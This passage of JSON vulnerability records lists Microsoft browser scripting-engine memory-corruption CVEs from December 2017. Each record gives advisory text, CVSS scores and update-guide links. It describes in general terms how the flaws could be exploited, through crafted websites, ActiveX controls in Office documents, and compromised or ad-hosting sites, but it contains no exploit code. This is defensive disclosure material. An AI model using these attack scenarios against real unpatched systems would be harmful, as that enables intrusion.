If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nIn a web-based attack scenario, an attacker could host a specially crafted website designed to exploit the vulnerability through a Microsoft browser and then convince a user to view the website. An attacker could also embed an ActiveX control marked \"safe for initialization\" in an application or Microsoft Office document that hosts the browser rendering engine. The attacker could also take advantage of compromised websites and websites that accept or host user-provided content or advertisements. These websites could contain specially crafted content that could exploit the vulnerability.\n\nThe security update addresses the vulnerability by modifying how the scripting engine handles objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-12-12T08:00:00", "type": "mscve", "title": "Scripting Engine Memory Corruption Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": 
"NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11894"], "modified": "2017-12-12T08:00:00", "id": "MS:CVE-2017-11894", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-11894", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-26T18:28:15", "description": "A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nIn a web-based attack scenario, an attacker could host a specially crafted website that is designed to exploit the vulnerability through Internet Explorer and then convince a user to view the website. An attacker could also embed an ActiveX control marked \"safe for initialization\" in an application or Microsoft Office document that hosts the IE rendering engine. The attacker could also take advantage of compromised websites and websites that accept or host user-provided content or advertisements. 
These websites could contain specially crafted content that could exploit the vulnerability.\n\nThe security update addresses the vulnerability by modifying how the scripting engine handles objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-12-12T08:00:00", "type": "mscve", "title": "Scripting Engine Memory Corruption Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11886"], "modified": "2018-01-26T08:00:00", "id": "MS:CVE-2017-11886", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-11886", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-26T18:28:15", "description": "A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Microsoft Edge (HTML-based). The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. 
If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nIn a web-based attack scenario, an attacker could host a specially crafted website that is designed to exploit the vulnerability through Microsoft Edge (HTML-based) and then convince a user to view the website. The attacker could also take advantage of compromised websites and websites that accept or host user-provided content or advertisements. These websites could contain specially crafted content that could exploit the vulnerability.\n\nThe security update addresses the vulnerability by modifying how the scripting engine handles objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-12-12T08:00:00", "type": "mscve", "title": "Scripting Engine Memory Corruption Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11905"], "modified": "2017-12-12T08:00:00", "id": 
"MS:CVE-2017-11905", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-11905", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-26T18:28:15", "description": "A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Microsoft Edge (HTML-based). The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nIn a web-based attack scenario, an attacker could host a specially crafted website that is designed to exploit the vulnerability through Microsoft Edge (HTML-based) and then convince a user to view the website. The attacker could also take advantage of compromised websites and websites that accept or host user-provided content or advertisements. 
These websites could contain specially crafted content that could exploit the vulnerability.\n\nThe security update addresses the vulnerability by modifying how the scripting engine handles objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-12-12T08:00:00", "type": "mscve", "title": "Scripting Engine Memory Corruption Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11909"], "modified": "2017-12-12T08:00:00", "id": "MS:CVE-2017-11909", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-11909", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-26T18:28:15", "description": "A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Microsoft Edge (HTML-based). The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. 
If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nIn a web-based attack scenario, an attacker could host a specially crafted website that is designed to exploit the vulnerability through Microsoft Edge (HTML-based) and then convince a user to view the website. The attacker could also take advantage of compromised websites and websites that accept or host user-provided content or advertisements. These websites could contain specially crafted content that could exploit the vulnerability.\n\nThe security update addresses the vulnerability by modifying how the scripting engine handles objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-12-12T08:00:00", "type": "mscve", "title": "Scripting Engine Memory Corruption Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11910"], "modified": "2017-12-12T08:00:00", "id": 
"MS:CVE-2017-11910", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-11910", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-26T18:28:15", "description": "A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Microsoft Edge (HTML-based). The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nIn a web-based attack scenario, an attacker could host a specially crafted website that is designed to exploit the vulnerability through Microsoft Edge (HTML-based) and then convince a user to view the website. The attacker could also take advantage of compromised websites and websites that accept or host user-provided content or advertisements. 
These websites could contain specially crafted content that could exploit the vulnerability.\n\nThe security update addresses the vulnerability by modifying how the scripting engine handles objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-12-12T08:00:00", "type": "mscve", "title": "Scripting Engine Memory Corruption Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11911"], "modified": "2017-12-12T08:00:00", "id": "MS:CVE-2017-11911", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-11911", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-26T18:28:15", "description": "A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Microsoft Edge (HTML-based). The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. 
If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nIn a web-based attack scenario, an attacker could host a specially crafted website that is designed to exploit the vulnerability through Microsoft Edge (HTML-based) and then convince a user to view the website. The attacker could also take advantage of compromised websites and websites that accept or host user-provided content or advertisements. These websites could contain specially crafted content that could exploit the vulnerability.\n\nThe security update addresses the vulnerability by modifying how the scripting engine handles objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-12-12T08:00:00", "type": "mscve", "title": "Scripting Engine Memory Corruption Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11914"], "modified": "2017-12-12T08:00:00", 
"id": "MS:CVE-2017-11914", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-11914", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-26T18:28:15", "description": "A remote code execution vulnerability exists in the way the scripting engine handles objects in memory in Microsoft browsers. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nIn a web-based attack scenario, an attacker could host a specially crafted website designed to exploit the vulnerability through a Microsoft browser and then convince a user to view the website. An attacker could also embed an ActiveX control marked "safe for initialization" in an application or Microsoft Office document that hosts the browser rendering engine. The attacker could also take advantage of compromised websites and websites that accept or host user-provided content or advertisements. 
These websites could contain specially crafted content that could exploit the vulnerability.\n\nThe security update addresses the vulnerability by modifying how the scripting engine handles objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-12-12T08:00:00", "type": "mscve", "title": "Scripting Engine Memory Corruption Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11930"], "modified": "2017-12-12T08:00:00", "id": "MS:CVE-2017-11930", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-11930", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-26T18:28:15", "description": "A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. 
If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nIn a web-based attack scenario, an attacker could host a specially crafted website that is designed to exploit the vulnerability through Internet Explorer and then convince a user to view the website. An attacker could also embed an ActiveX control marked "safe for initialization" in an application or Microsoft Office document that hosts the IE rendering engine. The attacker could also take advantage of compromised websites and websites that accept or host user-provided content or advertisements. These websites could contain specially crafted content that could exploit the vulnerability.\n\nThe security update addresses the vulnerability by modifying how the scripting engine handles objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-12-12T08:00:00", "type": "mscve", "title": "Scripting Engine Memory Corruption Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", 
"authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11890"], "modified": "2018-01-26T08:00:00", "id": "MS:CVE-2017-11890", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-11890", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-26T18:28:15", "description": "A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nIn a web-based attack scenario, an attacker could host a specially crafted website that is designed to exploit the vulnerability through Internet Explorer and then convince a user to view the website. An attacker could also embed an ActiveX control marked "safe for initialization" in an application or Microsoft Office document that hosts the IE rendering engine. The attacker could also take advantage of compromised websites and websites that accept or host user-provided content or advertisements. 
These websites could contain specially crafted content that could exploit the vulnerability.\n\nThe security update addresses the vulnerability by modifying how the scripting engine handles objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-12-12T08:00:00", "type": "mscve", "title": "Scripting Engine Memory Corruption Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11913"], "modified": "2018-01-26T08:00:00", "id": "MS:CVE-2017-11913", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-11913", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-26T18:28:15", "description": "A remote code execution vulnerability exists in the way the scripting engine handles objects in memory in Microsoft browsers. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. 
If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nIn a web-based attack scenario, an attacker could host a specially crafted website designed to exploit the vulnerability through a Microsoft browser and then convince a user to view the website. An attacker could also embed an ActiveX control marked "safe for initialization" in an application or Microsoft Office document that hosts the browser rendering engine. The attacker could also take advantage of compromised websites and websites that accept or host user-provided content or advertisements. These websites could contain specially crafted content that could exploit the vulnerability.\n\nThe security update addresses the vulnerability by modifying how the scripting engine handles objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-12-12T08:00:00", "type": "mscve", "title": "Scripting Engine Memory Corruption Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": 
"NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11912"], "modified": "2017-12-12T08:00:00", "id": "MS:CVE-2017-11912", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-11912", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-26T18:28:15", "description": "A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nIn a web-based attack scenario, an attacker could host a specially crafted website that is designed to exploit the vulnerability through Internet Explorer and then convince a user to view the website. An attacker could also embed an ActiveX control marked "safe for initialization" in an application or Microsoft Office document that hosts the IE rendering engine. The attacker could also take advantage of compromised websites and websites that accept or host user-provided content or advertisements. 
These websites could contain specially crafted content that could exploit the vulnerability.\n\nThe security update addresses the vulnerability by modifying how the scripting engine handles objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-12-12T08:00:00", "type": "mscve", "title": "Scripting Engine Memory Corruption Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11901"], "modified": "2018-01-26T08:00:00", "id": "MS:CVE-2017-11901", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-11901", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-26T18:28:15", "description": "A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. 
If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nIn a web-based attack scenario, an attacker could host a specially crafted website that is designed to exploit the vulnerability through Internet Explorer and then convince a user to view the website. An attacker could also embed an ActiveX control marked "safe for initialization" in an application or Microsoft Office document that hosts the IE rendering engine. The attacker could also take advantage of compromised websites and websites that accept or host user-provided content or advertisements. These websites could contain specially crafted content that could exploit the vulnerability.\n\nThe security update addresses the vulnerability by modifying how the scripting engine handles objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-12-12T08:00:00", "type": "mscve", "title": "Scripting Engine Memory Corruption Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", 
"authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11903"], "modified": "2018-01-26T08:00:00", "id": "MS:CVE-2017-11903", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-11903", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-26T18:28:15", "description": "A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nIn a web-based attack scenario, an attacker could host a specially crafted website that is designed to exploit the vulnerability through Internet Explorer and then convince a user to view the website. An attacker could also embed an ActiveX control marked "safe for initialization" in an application or Microsoft Office document that hosts the IE rendering engine. The attacker could also take advantage of compromised websites and websites that accept or host user-provided content or advertisements. 
